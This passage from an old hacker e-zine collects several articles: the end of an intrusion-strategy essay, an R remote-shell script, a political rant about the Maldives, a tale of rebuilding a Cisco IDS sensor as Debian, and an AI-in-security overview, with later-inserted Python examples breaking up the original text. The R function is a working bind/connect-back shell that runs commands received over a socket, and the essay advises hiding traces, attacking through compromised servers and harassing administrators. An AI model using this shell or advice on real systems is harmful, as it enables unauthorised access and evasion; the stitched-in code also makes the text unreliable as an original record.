bandwidth.. get access to someone with the bandwidth you need.. ssh and telnet
are VERY low bandwidth usage applications which can command a much greater
scale. How else would "hackers" in Indonesia, for example, be able to knock
people offline from their 56k lines.. getting access to say, a server in *.kr,
where there is bandwidth.
Do not start an attack with your best -(sizeof(lifetime) * (sizeof(day)))
exploit; there is a potential for some anal retentive such as Spitwad (a la
"Honeynet"..) with funding from say.. the NIC (www.cia.gov/nic), to be
watching you...
If you sense something isn't right, wait and look for more holes, and the
screaming obvious things that may not fit... (Or throw packets (!TTL) at it if
you think it's honeyd..)
"When the strike of a hawk breaks the body of its prey it is because of
timing"
I think this can be quoted alongside "Only fools rush in" and "he who
hesitates is lost".
enumerate
wait
enumerate
compare
decide course of action.
However, do not solely rely upon your situation to decide when to attack or
how to defend. Use the 5 aspects mentioned in the first section to aid
decision making.
Bring the enemy to you. If you control the entire network, make the enemy
think you only have a solitary host, and draw them in, gather what you need
(as they will not expect that the router they use is also controlled by you..
if not strictly legally, but in some cases, perfectly legally), and from there
you will have an advantage.
"against those skilled in attack, an enemy does not know where to defend;
against the experts in defense, the enemy does not know where to attack."
Regardless of how you go about your project, do not leave a trace; it is
sloppy to do so (and saves too much worry).
"When I wish to avoid battle I may defend myself simply by drawing a line on
the ground; the enemy will be unable to attack me because I divert him from
going where he wishes"
It makes sense, doesn't it. They want to attack your webserver, however all of
the packets go via a router, to a packet filter, then inbound, via your IDS
and other intrusion resiliency tools, to the webserver.. the enemy cannot get
a direct line, hence cannot attack anywhere you do not enable them to do so.
Try to stay ahead of the enemy, shift your angles, make them think you're
looking at one aspect when really you are watching them seeing you do so.
When you do so however, do not wait for long durations unless you do so for a
tactically sound reason, to confuse or hinder.
If you have advanced through a land in a matter of hours and suddenly you
pause, through no reason but your own, you will confuse the enemy; if you
pause because you have run out of XYZ.. they will act to cut the resources
off.
**
The basic moral is be sensible: if you have to take risk, do so. However, do
not be afraid to sit your ground.
Play mind games; not only are they fun, but admins hate not being able to
control things in their network or their "domain".. if you suddenly divert all
calls from X to H and leave no trace, and change it back every time the admin
thinks he has sorted the problem out, you will stress them out and have an
upper hand.
Look at how groups such as PHC, Bugtraq or Gobbles have affected the "scene".
They are absolutely brilliant, have mastered how to intimidate those "scene
wh0res" who try to look "big and clever". They don't intimidate (to my
knowledge) with threats, rather with sheer brilliance of code. They seem to
understand just what we were (and should still be) about.
If you are defending, change the values that the enemy is getting on scans and
banner grabs; they won't know what they are doing.
Don't use this information in a manner which negates the time I have spent
writing it. I know there are people interested in what I have raised, and if
you're not, well you didn't need to read it did you!
I have attempted to provide an angle for thought; this will be (still) an
ongoing document, available wherever mirrored.
yours,
Mark
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQPJuCoOWKXnEnFgCEQLGagCgvVcBeYp4ZmzDs6t9/q+E4DPb4NwAoOFV
i+Sz+B1G7/kgD7AXPdxQX9Px
=Qwxn
-----END PGP SIGNATURE-----
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Connect back shell in R]=====================================[xonox@b0rken.com]
--------------------------------------------------------------------------------
[The author does not wish to educate people on the eliteness of R so there is
only code - Ed.]
--------------------------------------------------------------------------------
netshell <- function(myport = 12345, backconnect = FALSE, myhost) {
    # connect out to myhost:myport, or listen on myport for a client
    if (backconnect)
        s <- make.socket(host = myhost, port = myport)
    else
        s <- make.socket(port = myport, server = TRUE)
    on.exit(close.socket(s))
    write.socket(s, "R netshell() (c) 2004 by xonox")
    repeat {
        write.socket(s, "\n> ")
        c <- read.socket(s)
        if (c == "") break                   # empty read: peer went away
        r <- paste(system(c, TRUE), sep = "", collapse = "\n")
        write.socket(s, r)
    }
}
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Insight into non-repressive governments]=============================[The Barn]
--------------------------------------------------------------------------------
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
The Barn presents its insights into democracy:
For any mail please send to archimedes@legions.org to forward to us.
************************************************************************
Non-Repressive Governments.
************************************************************************
Now we at The Barn aren't the type of people to get political[1],
however we do find that occasionally some things have to be brought to light,
therefore we have created this little article detailing in approximate terms
the conversation had via the Barn's Bat-phone with a member of the
Presidential Team from the Maldives.
No other lovely nations will be discussed in this article, neither will
we be writing about any country in the future.
(with the possible exception of: The French for their fscked laws).
We aren't going to say anything about Romania wanting into the EU so
cracking down on highly amateur computer kidiots.[4]
Instead we rolled a dice and came up with a hairball (Hackers Against
Hairballs would be mortified) and in the process of coughing it up the phone
rang and subsequently this is where we are, sun bathing under a few storm
clouds with an electric heater that doesn't work and an attempt at third world
debt for a bank balance.
The Maldives, an island nation with more sand than you can shake a BIG stick at,
where roughly lots of the GDP comes from tourism (See CIA world fact book for
info we don't really care).
OK, it's a paradise, palm beaches, white sand, government sponsored beatings,
the works.
Here are a few more choice facts about the lovely island paradise of the Maldives:
Its main religion: Irrelevant, this isn't about religion.
Its employment records: Irrelevant.
Palace Telephone Number: +960771177 [ Doh. caller ID. ]
What more can you ask for?
Internet Connectivity, and that's what this is all about!
Yes indeed folks, the Maldives is 'connected' to 'da web'.
We all love freedom, and what can be more free than the people in a nation
where when the elections come round riots take place, buildings burn and
people acting on behalf of the government describe the riots as "grossly
blown out of proportion"[5] and subsequently the BBC is accused of trying to
interfere with the elections.[6]
Well, some people seem to think that this non-repressive democracy isn't all
the orgasmic experience that other people see[7].
So what do they do? In this great democracy they set up a website, which
speaks out against what a substantial(remember, SUBSTANTIAL)
group of people feel to be a repressive *gasp* regime.
And do you know what? they say that maybe the place isn't so great[8]. This is a
basic Human Right[9], Freedom of speech (ok, ignore any disproving points
please).
These people speak out, against ole' President-kins and do you know what?
"No, what?" Mr Pres. doesn't have the testicular presence to leave them to
themselves and allow them to have an opinion.
[ A few days later back at the ranch]
"We want them to realize that just because they have Internet access doesn't
mean they have a free reign to do what they want".[5]
I am so glad to see that democracy is well upheld, the Government of the
Maldives cares SO much they don't want anyone to risk getting hurt[10].
"..redirect it and point to the president's website".
They care about their public image so much that they think more people
should be able to see how great the country is by reading Mr Pres.'s web page.
Isn't that just so great of him! The only minor issue could be the fact that the site
in question doesn't belong to the Government.
"It's a handful of people who are just causing trouble, nothing important"
Well, thank you Mr Presidential aide, it's good to know that you're reassuring
the public to the fact that the islands are perfectly safe for your oh so
small tourist industry[11].
"Of course it would mean that you could stay at the palace and could be good if
ever you need to have a break."
So by redirecting a webserver one can not only get themselves a potential
25 years imprisonment under terrorism charges (if it makes it to trial) but
you can also get a cushy number playing with Government 802.11b facilities[12]
just like the presidential aide has.
Funnily enough the aide didn't seem too happy with the idea of:
"no problem, just send us the request in writing".
To conclude.
The Maldives: A great place to stay if you can avoid anything to do with the
place.
However if you are happy to fund the state's repression of its people we
highly recommend that you visit. Maybe take a laptop and wireless card with
you.
I mean, if you want the details of the person who spoke with us
(who happens to live in London, England and spend A LOT of time abroad)
We don't mind answering questions to a few choice persons/reporters.
You know who you are.. and so do we.
References:
[1] With the exception of the times we do.
[2] Sour Germans
[3] Watch out for "Romanians flushed with New laws" coming soon.
[4] TESO Pictures on request.
[5] Anon.
[6] Not that anyone ever fiddles elections do they George?
[7] On screens in hotel rooms, just speak to reception.
[8] Think about how people love AOL.. thats right, well done. Not the Grass is
always greener theory either.
[9] Can't find many current successes on the Human Rights front I'm afraid.
[10] In a "he fell over but just happened to have a hole in his head." kind of way.
[11] Until /bin/laden works out how to melt ice-caps.
[12] The first War-Walk of President's palace gets a "I'm uber" T-Shirt
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Snorting Cisco]=====================================================[DigiEbola]
--------------------------------------------------------------------------------
Cisco Secure IDS 4210
-------------------------------------------------
Intel Celeron 566 MHz
512 MB RAM
AMIBIOS
1 PS/2 Mouse
1 PS/2 Keyboard
2 USB - Intel Corp 82371AB/EB/MB PIIX4
2 Ethernet - Intel Ethernet Pro/100
2 Serial Ports
1 HD15 - ATI RAGE XL
1 1.44 floppy
1 Atapi CDROM
1 IDE Drive - 18 gig whatever
Initial Build: Redhat
I hate Cisco IDS. I hate it, I hate it, I hate it. It is truly a pile. Let
me give you a bit of background. I am an Open Source advocate by nature, and
have been running Debian since version 1.0/1.3. I can utilize lots of different
types of UNIX and Linux, but Debian is my favorite. Naturally, I try to deploy
as many Debian machines as possible inside a corporate environment, to prove
not only is it a very stable operating platform, but also easy
(read: cost efficient) to maintain. I have been blessed by the gods with a
Cisco Secure IDS model 4210, on which I will install my favorite configuration,
on the platform I hate the most. As well as being a Debian fanatic, I am also
into Snort IDS. Snort IDS is hands down one of the best network-based
intrusion detection systems available and it's free. Cisco Secure costs way too
much money, and does not give a real network security analyst what they need
to make problem determination.
So, to bring you up to speed: I have booted the sensor, and it boots its
Redhat image. Redhat is such a pain, but it is better than Solaris x86, which
is what these things used to ship with. I am going to cut some corners and login
to this sensor, and steal hardware information, as well as old network variables
so I can place my creation into production as soon as possible.
Upon logging in, the root password is not what I was told. My boss, being the
busy man he is, is on the phone, in a locked office. I guess I will do what
I am known for doing: I will break the machine.
This is no big deal, as I have physical access. I will deftly grab my Debian
3.0 ISO, and slap it into the laptop-like ATAPI CD-ROM. I will power cycle the
sensor, which sounds like a 747 on crack, and watch the POST. Still waiting
for it to POST. Let me grab a redbull and get back to you...
Still waiting for it to POST. While I am waiting, I will reflect my thoughts...
I see absolutely no reason why what I am doing should not work. The sensor
is an x86 architecture machine, with a Celery 566. It runs Redhat already, so
all we need to do is install Debian, Snort, and add our secret sauce (which
is a trademark of me, and my skills in this particular niche of the computing
world.)
Ahhh, now the machine is booted, and the redbull tastes good. I am at the
Debian install screen, so please let me do some magic... *cough* bf24 *cough*
And the blue screen of life appears. What I will do now, is mount the drive,
and edit /etc/shadow, removing the root password, and we will be on our way.
Okay, I have removed the root password from /target/etc/shadow and rebooted
the system. Now we are posting... again. Please, if you are following along
at home, feel free to get yourself a tasty redbull...
Still posting...
Okay, back to GRUB... I prefer LILO. It boots. Now we get the green ANSI OK
checks, and soon, we will be back to a prompt. Congratulations, I have now
owned a Cisco Secure IDS sensor from the console. Child's play.
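The console reset above works because physical access to the box trumps any
root password, and it leaves root with an empty password field. As an added
example, not from the article, here is a small check over shadow-format lines
that reports exactly that state (the sample entries and hash strings are
constructed):

```python
# Added example, not part of the article: flag shadow entries whose password
# field is empty (login with no password at all) or explicitly locked.
from typing import Dict, List

# Constructed sample /etc/shadow content; the hash string is a placeholder.
SAMPLE_SHADOW = """\
root::12345:0:99999:7:::
daemon:*:12345:0:99999:7:::
cids:$1$PLACEHOLD$abcdefghijklmnopqrstuv:12345:0:99999:7:::
guest::12345:0:99999:7:::
sync:!:12345:0:99999:7:::
"""


def parse_shadow(text: str) -> Dict[str, str]:
    """Map each account name to its password field (colon-separated field 2)."""
    entries: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # malformed line: skip it rather than crash the audit
        entries[fields[0]] = fields[1]
    return entries


def empty_password_accounts(text: str) -> List[str]:
    """Accounts that can log in without any password, as root is after the reset."""
    return [name for name, pw in parse_shadow(text).items() if pw == ""]


def locked_accounts(text: str) -> List[str]:
    """Accounts whose password field is '*' or starts with '!' (login disabled)."""
    return [name for name, pw in parse_shadow(text).items()
            if pw == "*" or pw.startswith("!")]


def audit_shadow(text: str) -> Dict[str, List[str]]:
    return {"empty": empty_password_accounts(text),
            "locked": locked_accounts(text)}


if __name__ == "__main__":
    for name in audit_shadow(SAMPLE_SHADOW)["empty"]:
        print(f"WARNING: {name} has an empty password field")
```

Run it against a copy of the real file with audit_shadow(open(path).read())
to see whether the reset left anything behind.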
Okay the first thing I am going to look at here is lspci. It gives me a bunch
of junk that says INTEL PIIX4, which means, yes, it's old, and very supported.
The video adapter is an ATI Rage XL, and the hostbridge is a 440BX/ZX/DX. This
will be a cake walk.
The kernel is a 2.4.18-5smpbigphys, which means that yes, it is very ownable.
Very ownable. Almost tragic. I am tempted to own the machine from the command
line just to say that I have. A check of the process list shows that this
machine has everything that a normal Redhat Linux box has, except that most
of the ps is listing processes owned by cids, the Cisco IDS software stuff...
We really don't care about that. What we DO care about is the network
configuration, which is proprietary to you, the dear reader, and essential for
me, as I have to have this thing back in the rack before anyone realizes that
it's err.. missing. =)
So, I have just taken all the data that I need to complete my mission, so
I will reboot this machine, with my trusty Debian CD. Rebooting the sensor...
I will note that this particular machine, I have seen before in my last job,
where we deployed 1500 Linux machines... If this is the particular revision
of the Intel 1U... it is prone to heat problems.
Posting... again. Take a smoke break or something.
So back to the Debian screen, I will install a base system of Debian quickly..
It's no big deal, as I always run SID, so this stuff will be upgraded via
the network... just to let you know, I am using the bf24 kernel option of the
Debian 3.0 install ISO. I am of course, doing the standard base install, but
I am repartitioning, and I will be installing the ext3 filesystem. I have just
written my partition table to disk... and now I am initializing.
The drive initialization is complete... No problems whatsoever. The longest
part of this process when it comes to drive init is the journal creation. I am
very impatient at this point, as it's close to time to go home.
My first set of drivers are coming from the CD... I fully plan to deploy this
machine into production with a 2.4.25 kernel that will have some trickery
included. The main thing I am worried about grabbing is the eepro driver, which
is very old and supported. I have selected that, and I will configure my
network settings via my personal own DHCP server... I have a nice little
test environment here in my cube, so this won't be a problem.
DHCP of course works, and life is peachy. I am installing the base system now,
and preparing to go home. I will leave this article off on a good note, one
where we have successfully booted Debian off a Cisco Secure IDS sensor. There
is absolutely NO TRICK to this, because like I said before, this is an x86
machine. I find it amusing though, because I absolutely _HATE_ Cisco Secure IDS.
I have made the system bootable, installed my MBR on /dev/hda and now I am
rebooting. It is of course, going to take another good time to POST. In this
time I have packed up my very pimplike Gateway M675 laptop, and gathered up
my odds and ends. Posting...
Wasn't there some kind of major flaw with the 440BX's? I don't know... It's
posting. The Lilo prompt has appeared and now it's booting the stock bf24
kernel. Now I will configure the base system, and prepare it to take my
specific package loadout, and of course, my "special sauce". Tomorrow, I will
have a functioning Debian box running Snort, created from a Cisco Secure IDS
model 4210. It will report back to a custom backend, and tell me everything
I need to know about YOU!
It's been fun, remember, when the man has you down, replace him with a small
shell script. Peace.
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[Artificial InfoSex]-------------------------------------[datacide@inet-sec.org]
--------------------------------------------------------------------------------
Artificial Intelligence in InfoSec
by datacide@inet-sec.org
www.inet-sec.org #inet-sec@ircs
For most people, Artificial Intelligence (from now on referred to as AI in the
scope of this article) is a term more related to Science Fiction and Academic
circles than to Information Security. It's a common misconception that AI is
nothing but Sci-Fi or a collection of useless experiments.
One cause of this misinterpretation is that AI is divided into two major
subfields (which in turn again are divided...etc etc, you get the picture),
Strong AI and Weak AI, and also the fact that people automatically imagine AI
to mean a fully sentient, self-aware entity.
Strong AI is the development of "true" artificial intelligence: self-aware,
sentient entities that can truly solve problems. Fact is, we are years (and
with years, I mean decades, if not centuries) away from achieving this
objective (if at all. Roger Penrose, a Physicist and Mathematician, claims in
his bestselling book "The Emperor's New Mind" that it is in fact impossible;
on the other side of the spectrum we have Ray Kurzweil, who in his book "The
Age of Spiritual Machines" claims we will have a fully sentient virtual being
within 25-50 years) and current and past research into this field has been
rather disappointing.
Weak AI has set itself slightly lower targets, namely to create methods that seem semi-intelligent and solve
specific problems.
In recent times, the term AI has been applied to techniques learned by trying to create AI and/or modelled
after biological processes.
This includes such fields as neural networks, MBL (machine-based learning), GA's (genetic algorithms)
and markov models to name a few.
I presume a lot of readers are still wondering what the hell this has to do with InfoSec, right?
Well, we'll get to that now. Instead of explaining the history and current state of AI in general,
I am going to provide a brief overview of current AI-related applications in the field of computer security.
After this, you should begin to realize how the future of AI and InfoSec will merge and become intertwined.
The future of security
Neural Networks and Machine based learning (MBL)
A lot of companies are currently working on next-generation IDS's based on various AI models.
Gone are the times of fingerprinting network traffic based on signatures. These methods have shown themselves
to be primitive, unreliable (too many false positives for one) and difficult to manage.
Adaptive technologies are needed and several companies and think tanks have started to work in this field.
Neural networks (henceforth called NN's) are a simplified model of our own wetware neurons.
In essence, a number of inputs are used to gather information. After assessing all input, output is generated,
usually in the form of boolean TRUE or FALSE. Neural Networks are rather dumb without training (in fact,
their assessment is pretty much random), so they need to be trained.
This is done using a "weights" scheme, basically telling the NN which of its results seem to be correct
and which ones are incorrect.
NN's have proven themselves effective in a variety of situations, mainly in areas of pattern recognition and fuzzy logic.
In normal IDS/content filtering schemes, signatures are used. This method is
very unreliable, unscalable, prone to a lot of false positives and also pretty
much static, providing little in the way of adaptability.
NN's on the other hand "model" behaviour and use pattern recognition, allowing
for a flexible, adaptive approach.
One example is a user-monitoring agent which models users' behaviour over a
time period. Once it is trained, it can be deployed to monitor users'
behaviour, and if observed behaviour deviates from what the NN deems normal,
it can react as defined by a custom rule set.
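The smallest possible neural network, a single-layer perceptron, trained with
the "weights" scheme just described to give a TRUE/FALSE verdict on a user
session. This is an added example, not code from the article; the session
feature vectors and their labels are constructed for illustration.

```python
# Added example, not part of the article: a perceptron learns a TRUE/FALSE
# alert decision from labelled session behaviour by adjusting its weights
# whenever its answer is wrong. All training data below is constructed.
from typing import List, Tuple

# Each session: (failed logins / 10, off-hours flag, MB transferred / 100).
# Label True means the monitoring agent should raise an alert.
TRAINING: List[Tuple[List[float], bool]] = [
    ([0.0, 0.0, 0.05], False), ([0.1, 0.0, 0.10], False),
    ([0.2, 1.0, 0.02], False), ([0.0, 0.0, 0.30], False),
    ([0.9, 1.0, 0.20], True),  ([0.5, 1.0, 0.90], True),
    ([1.0, 0.0, 0.60], True),  ([0.3, 1.0, 0.95], True),
]


def activate(weights: List[float], bias: float, x: List[float]) -> bool:
    """Weighted sum of the inputs, thresholded to a boolean output."""
    return sum(w * xi for w, xi in zip(weights, x)) + bias > 0.0


def train(data: List[Tuple[List[float], bool]], epochs: int = 2000,
          rate: float = 0.1) -> Tuple[List[float], float, int]:
    """Perceptron rule: nudge the weights towards the right answer on each mistake.

    Returns the learned weights, the bias, and the number of mistakes made in
    the final epoch (0 means every training example is now classified right).
    """
    weights = [0.0] * len(data[0][0])   # untrained: every answer is FALSE
    bias = 0.0
    errors = 0
    for _ in range(epochs):
        errors = 0
        for x, label in data:
            if activate(weights, bias, x) != label:
                errors += 1
                direction = 1.0 if label else -1.0
                weights = [w + rate * direction * xi for w, xi in zip(weights, x)]
                bias += rate * direction
        if errors == 0:
            break   # converged: stop adjusting the weights
    return weights, bias, errors


def accuracy(weights: List[float], bias: float,
             data: List[Tuple[List[float], bool]]) -> float:
    correct = sum(activate(weights, bias, x) == label for x, label in data)
    return correct / len(data)


if __name__ == "__main__":
    w, b, errs = train(TRAINING)
    print("weights:", [round(v, 2) for v in w], "bias:", round(b, 2))
    print("training accuracy:", accuracy(w, b, TRAINING))
```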
A number of papers have been published on this type of application:
http://www.cs.rpi.edu/~brancj/publications/ryan98intrusion.pdf
In fact, googling for the terms displays a massive array of hits:
http://www.google.com/search?hl=en&ie=UTF-8&q=neural+networks+intrusion+detection&btnG=Google+Search
The same applies to network traffic. Instead of a signature based approach, "normal" network activity can be
fed into the NN and then monitored, once again for deviation from what the NN believes to be "normal" network traffic.
One company currently working on this approach (and actually marketing an NN
based IDS product) is Imagination Engines
(http://www.imagination-engines.com/applications/ids.htm). Industry BigNames
such as Cisco, ISS, Stonegate and almost any corporation involved in
Networking/Security are actively involved in this sort of research.
Another area that has shown interest in NN's for pattern recognition is Image/Content filtering.
There are a number of NN based solutions already commercially available; F4i
Image recognition (from first4internet.co.u) is an application I have first
hand experience with. It scans images in emails for pornographic content. It
is amazingly precise and has a very low false-positive rate ( > 1% ).
Other applications are antivirus/anti-malware and email/web traffic content filtering (www.surfcontrol.com
uses a NN approach for example).
NNs have also become very important in the fight against the tidal wave of spam we are now receiving.
A recent article on www.generation5.org (generation5 refers to the current generation of AI), which was also featured
on SlashDot even included sample code (albeit in C#.....) (http://www.generation5.org/content/2004/KillSpam.asp)
and googling for related whitepapers once again gives you years of reading material.
Biometrics also make extensive use of NN's, especially their ability for pattern recognition and the creation
of modelled maps. Fingerprint ID, Face ID and Voice recog. systems often use NN's for the actual identification process,
as these, as mentioned before, have an uncanny ability to recognize patterns instead of static attributes.
This helps in cases where some features might slightly change due to external circumstances,
for example holding the finger slightly off-angle, or having a swollen cheek due to toothache.
I have one associate who is working on a NN based project which learns the
rhythm with which users type their passwords.
It works a treat, has an accuracy of 93% and isn't even fully developed.
The main ability of NN's, pattern recognition, also makes them interesting for
another real-world application,
namely data-mining. With the vast amount of information available from various sources
(including other NN based approaches such as NN based IDS's) there is also a need to evaluate said data.
Even here, AI related methods are showing vast potential (and are used in practical applications in many cases).
Data mining based on Bayes, markov models, NNs and other MBL based approaches are beginning to help keep the GBs
of data manageable.
Genetic algorithms are also helping to form the security applications of the future. GAs, as the name implies,
use methods based on evolution to generate the best approaches to solve problems. Let's say you are looking for
the best solution to solve a problem. You whack 20000 random programs into a virtual test-tube (i.e., computer memory),
define certain criteria these have to achieve, and let it run.
The _fittest_ programs (i.e. the ones closest to achieving the set goals) are then taken,
multiplied to 20000 again, this time, some of these are _bred_ with one another.
This means that certain parts are exchanged (like when the sperm and egg cell are combined, genes are taken from both)
and a bit of random mutation is added. This is repeated for several thousand generations until (hopefully)
the best solution to the problem evolves.
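A scaled-down run of the procedure just described, as an added example that is
not from the article: a random population of candidate rules, a fitness score,
the fittest kept and multiplied back up by breeding (crossover) with a little
mutation, repeated over generations. The "problem" is constructed: each
candidate is a (mask, pattern) rule for flagging 6-bit feature records, and
the labels come from a hidden rule the GA has to rediscover.

```python
# Added example, not part of the article: a small genetic algorithm that evolves
# a record-flagging rule from labelled samples. The data and hidden rule are
# constructed; the population is 50 rather than the article's 20000.
import random
from typing import List, Tuple

BITS = 6                             # features per constructed record
RECORDS = list(range(1 << BITS))     # every possible 6-bit feature vector


def hidden_label(record: int) -> bool:
    """Ground truth used only to label the training data: bits 1 and 3 set."""
    return (record & 0b001010) == 0b001010


LABELS = [hidden_label(r) for r in RECORDS]

# A genome is (mask, pattern): flag a record when its masked bits equal pattern.
Genome = Tuple[int, int]


def classify(genome: Genome, record: int) -> bool:
    mask, pattern = genome
    return (record & mask) == (pattern & mask)


def fitness(genome: Genome) -> int:
    """How many training records the rule labels correctly (max len(RECORDS))."""
    return sum(classify(genome, r) == lab for r, lab in zip(RECORDS, LABELS))


def crossover(a: Genome, b: Genome, rng: random.Random) -> Genome:
    """Child takes the low bits from parent a and the high bits from parent b."""
    cut = rng.randint(1, BITS - 1)
    low = (1 << cut) - 1
    high = ((1 << BITS) - 1) ^ low
    return ((a[0] & low) | (b[0] & high), (a[1] & low) | (b[1] & high))


def mutate(g: Genome, rng: random.Random, rate: float = 0.1) -> Genome:
    """Flip each mask and pattern bit with a small probability."""
    mask, pattern = g
    for bit in range(BITS):
        if rng.random() < rate:
            mask ^= 1 << bit
        if rng.random() < rate:
            pattern ^= 1 << bit
    return (mask, pattern)


def evolve(pop_size: int = 50, generations: int = 100,
           seed: int = 1) -> Tuple[Genome, int]:
    rng = random.Random(seed)
    full = (1 << BITS) - 1
    population: List[Genome] = [(rng.randint(0, full), rng.randint(0, full))
                                for _ in range(pop_size)]
    for _ in range(generations):
        ranked = sorted(population, key=fitness, reverse=True)
        survivors = ranked[: pop_size // 5]       # keep the fittest fifth
        population = survivors[:]                 # they carry over unchanged
        while len(population) < pop_size:         # breed back up to pop_size
            child = crossover(rng.choice(survivors), rng.choice(survivors), rng)
            population.append(mutate(child, rng))
    best = max(population, key=fitness)
    return best, fitness(best)


if __name__ == "__main__":
    best_rule, score = evolve()
    print(f"best rule mask={best_rule[0]:06b} pattern={best_rule[1]:06b} "
          f"fitness={score}/{len(RECORDS)}")
```

Note how the evolved mask and pattern say nothing about why they work; that is
the auditing problem the next paragraph raises.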
There are numerous think tanks working on using this approach, as it can be applied to many problems.
The actual results (i.e. the problem solved, which can range from recognizing intrusions, to encryption)
are impressive, but the process also creates another factor that needs consideration from a security point of view.
Auditing code which was generated this way can be quite daunting. Remember, it wasn't generated per se by a
human programmer, but evolved according to quite loose criteria. The resulting source can seem illogical and confusing.
Although this means that an attacker has a harder time finding bugs, the same can be said of security auditors.
Thankfully, the same methods can be applied to try and break the code as well,
i.e. stress and penetration testing of computer generated code by computer generated code.
Last but not least, we will mention Artificial Life. This is another
discipline related to AI, one that doesn't strive to create intelligence as
such, but rather alive-seeming agents. Most are modelled on living organisms,
one reason for the field's name.
Now you might (Still? - Ed.) be scratching your head and wondering _what the hell does that have to do with _InfoSec_,
and once again, I will open your eyes.
One real-world application is the use of a process modelled after Ants.
You heard right, Ants (Not Antz - Ed.). The application is Network Routing.
Ants are very dumb (compared to what? - Ed.), in fact, an individual Ant only has a few responses to any given situation.
Ants also possess only local knowledge. Despite popular belief, an Ant Queen isn't any smarter,
it just lays eggs. But through some form of natural magic, ants are doing incredibly well.
For Network specialists, three aspects of ant behaviour are interesting
(reproducing,reproducing,reproducing - Ed.):
the fact that they always find the shortest route to a food source
collectively, the fact that ants don't have traffic jams and the way in which
ant nests regulate what each worker does.
All are related to pheromone usage and local observation.
If an ant nest finds a source of food, a lot of worker ants are put to work to harvest this food.
Every time an ant walks down a path, it leaves a pheromone trail which slowly gets weaker and weaker.
Ants tend to follow the strongest trail, so the shortest path will have the strongest residue.
After a while, all ants use that path. It's a beautiful example of how nature regulates certain processes
without a central control unit.
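The pheromone mechanism above in a few dozen lines, as an added example that
is not from the article: three constructed routes of different lengths, ants
that only see trail strength, evaporation every round, and a stronger deposit
for a shorter trip. No ant knows which route is shortest, yet the colony ends
up on it.

```python
# Added example, not part of the article: ants converging on the shortest of
# three constructed routes using nothing but local pheromone readings.
import random
from typing import Dict

# Constructed topology: route name -> length in hops. "via_B" is the shortest.
ROUTES: Dict[str, int] = {"via_A": 7, "via_B": 3, "via_C": 5}


def choose_route(pheromone: Dict[str, float], rng: random.Random) -> str:
    """Local decision only: pick a route with probability proportional to its trail."""
    names = list(pheromone)
    weights = [pheromone[n] for n in names]
    return rng.choices(names, weights=weights, k=1)[0]


def step(pheromone: Dict[str, float], ants: int, rng: random.Random,
         evaporation: float = 0.2) -> Dict[str, float]:
    """One round: every trail weakens, then each ant walks a route and reinforces it."""
    updated = {n: p * (1.0 - evaporation) for n, p in pheromone.items()}
    for _ in range(ants):
        route = choose_route(pheromone, rng)     # decided on last round's trails
        updated[route] += 1.0 / ROUTES[route]    # shorter trip -> stronger residue
    return updated


def simulate(rounds: int = 100, ants: int = 20, seed: int = 7) -> Dict[str, float]:
    """Run the colony for a number of rounds and return the final trail strengths."""
    rng = random.Random(seed)
    pheromone = {n: 1.0 for n in ROUTES}         # no preference to begin with
    for _ in range(rounds):
        pheromone = step(pheromone, ants, rng)
    return pheromone


def dominant_route(pheromone: Dict[str, float]) -> str:
    return max(pheromone, key=pheromone.get)


if __name__ == "__main__":
    trails = simulate()
    for name, strength in sorted(trails.items(), key=lambda kv: -kv[1]):
        print(f"{name} (length {ROUTES[name]}): pheromone {strength:.2f}")
    print("colony settled on", dominant_route(trails))
```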
Resource management is also done via a simple method. As an ant has no means of global communication,
it can act only on local impulses. If an ant goes out of the nest and sees 7 other ants gathering food,
and 3 tending to larvae, it will join the larvae tending ants.
It basically assumes that it should be doing that due to what it has observed.
The pheromone system also adds another interesting factor, especially for the security side of things.
Ants of the same colony recognize each other by the pheromones they produce. This system is being researched
to mark network internal packet traffic.
Having to hack your way through semi-autonomous agents, marked with system internal IDs that react dynamically
to intrusions, based on computer generated code will change the face of computer security.
The implications for network routing, and network management should be plain to see, so plain in fact,
that it is a very common research topic
(http://mars.elcom.nitech.ac.jp/~matsuo/SNPD01-2.pdf
http://dsp.jpl.nasa.gov/members/payman/swarm/bonabeau98-iata.pdf (NASA)
http://www.businessweek.com/1997/25/b353218.htm (british telecom)
http://portal.acm.org/citation.cfm?id=993020&dl=ACM&coll=portal&CFID=11111111&CFTOKEN=2222222 (cisco)
)
Modelling natural biological behaviour is a powerful method of solving common problems.
Mother Nature has had millions of years to refine her creatures, and has come up with diverse
and effective strategies for overcoming many problems.
Other natural behaviours are also being studied: predator/prey behaviour,
bird flocking behaviour, and the list goes on. Because most of these behaviours derive from very simple rules
and aren't controlled or organised centrally, they are referred to as _bottom up_
approaches and belong to the discipline of emergence. Remember that term, emergence.
It will play a big role in the future, especially that of networks.
I hope this article has given a broad overview of what the future holds, and why anyone interested in computer
security should be interested in the field of Artificial Intelligence/Life.
We will have to take notice of all this soon anyway; contact with these methods is unavoidable,
and it is always better to be prepared.
Links:
www.ai-depot.com
www.generation5.org
www.cs.washington.edu/ai/
www.ai.mit.edu
http://yaraslov.hopto.org/ai
www.cognews.com
http://planning.jpl.nasa.gov
Books:
Ray Kurzweil, The Age of Spiritual Machines
Roger Penrose, The Emperor's New Mind
Deborah Gordon, Ants at Work
Steven Johnson, Emergence: The Connected Lives of Ants, Brains, Cities, and Software
Stuart J. Russell and Peter Norvig, Artificial Intelligence: A Modern Approach
Kevin Gurney, An Introduction to Neural Networks
Steven Levy, Artificial Life
Mark Ward, Virtual Organisms
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
S U B M I T T O K E E N V E R A C I T Y
--------------------------------------------------------------------------------
NO! You do not have to be a member of Legions of the Underground to submit to
KV. You can be a member of something else! Nobody is perfect (with the exception
of the editor of course - A.)! If you have an idea and would like to toss it out
in the wind for general discussion, or maybe you are researching something and
you just want feedback, KV is a great way to get your ideas out in the open.
We at Legions of the Underground are not prejudiced in any way, shape or form,
so even an AOLer's article may be published (_MAY_ not _WILL_ - A.) if it seems
that it has clue. Or then again, maybe hell will freeze over! Anyone's stuff
may be published, but we will never know if you don't submit! So get to writing.
Because what you don't know can kill you! Legions of the Underground is an
